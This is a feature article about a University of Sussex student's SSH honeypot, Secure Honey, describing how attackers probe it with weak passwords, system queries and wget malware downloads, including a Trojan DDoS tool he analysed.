How can you tell who’s up to no good when it comes to your networks and computer systems?
Simon Bell, a computer science student in his last year at the University of Sussex, has set out to help answer that question. He’s created an SSH (Secure Shell) honeypot written in C with the aim of researching the techniques of malicious attackers trying to infiltrate the network. Dubbed Secure Honey, Bell designed his honeypot as a final project, which he tracks and writes about on his site.
Hacking the Hackers:
Honeypots, for the uninitiated, are decoy systems or servers designed to track and log the activities of attackers trying to intrude your system (SANS has a great FAQ for further reading). Instead of the attackers gaining data, the honeypot collects the actions and attempts at intrusion for further analysis. The would-be hackers get nothing – and will quickly move on to the next possibly vulnerable server after a few fruitless tries.
“Something really drew me to the idea of luring hackers into a honeypot to watch how they operate and to discover what sort of techniques they may deploy to infiltrate a system,” he says. Anyone can keep up with what Secure Honey attackers are up to on Bell’s live stats page, where hacking attempts, the most commonly used passwords and more are tracked in real time.
The attackers come to Bell’s honeypot from all over the deep dark web. Initially worried that he’d have to advertise the honeypot on underground forums for the word to get out, the script kiddies started pouring in from the day it went live, last October. He estimates Secure Honey averages around 1,000 hacks a day. Bell was most surprised by the amount of hackers simply scanning for servers, like his, running SSH on port 22 (the default for SSH) that employ weak passwords. “The fact that there are so many hackers scanning for these weak servers suggests that there may be a large number of live servers out there that have weak security,” Bell says.
Tracking the Attempts:
Those accessing the honeypot have used a wide range of techniques to try and get in the network, but nearly each attacker starts with:
- The ‘uname-a’ command which displays the complete system name and version, and is the logical first step in seeing what kind of tools are needed for infiltration, followed by;
- ‘Wget,’ used to test the servers speed as well as download remote files, which in the honeypots’ case is almost always malware.
Bell’s most interesting download so far was a malicious C++ program which he discovered was a Trojan DDoS tool connected to a command and control server in China, built to receive denial of service commands. “The commands instruct the server to carry out a DoS attack on a certain IP address,” Bell explains. The server could also create a botnet capable of carrying out large scale attacks. A few other Trojans have also been downloaded to the honeypot – enough to surprise Bell. He hadn’t realized there was so much malware targeted specifically toward Linux servers.
First, passwords need to be stronger. “I was shocked to find the most common passwords being used to hack into my honeypot were “123456”, “password” and “changeme” since these passwords seem so obviously weak and easily crackable,” Bell says. “So when I researched why these passwords were being used so frequently by hackers I was amazed to see that these are the most common passwords being used to secure computer systems around the world.”
Overall, Bell’s research shows just how large a hacking community there is looking to explore their tactics in different places, just trying to get to some sort of ‘pot of gold’. “Cyber security is a very real and constant threat,” he’s learned. “People that don’t take cyber security seriously are totally unaware that there might be a Trojan running on their machine right now; being used by criminals to hack into banks & government organizations. “
Bell’s interest in malware has ventured outside the honeypot, as well. Researching malware, he says, is more interesting to research, as you “get to understand how a hacker’s mind works and what techniques they’re using to exploit a system.” He recently reverse engineered a malicious version of Flappy Birds, and after graduation, he’ll continue with similar research as well as more complex malware, such as those written in C/C++. Eventually he’d like to learn pentesting and more about ethical hacking, but for now, he’ll continue blogging and researching Secure Honey.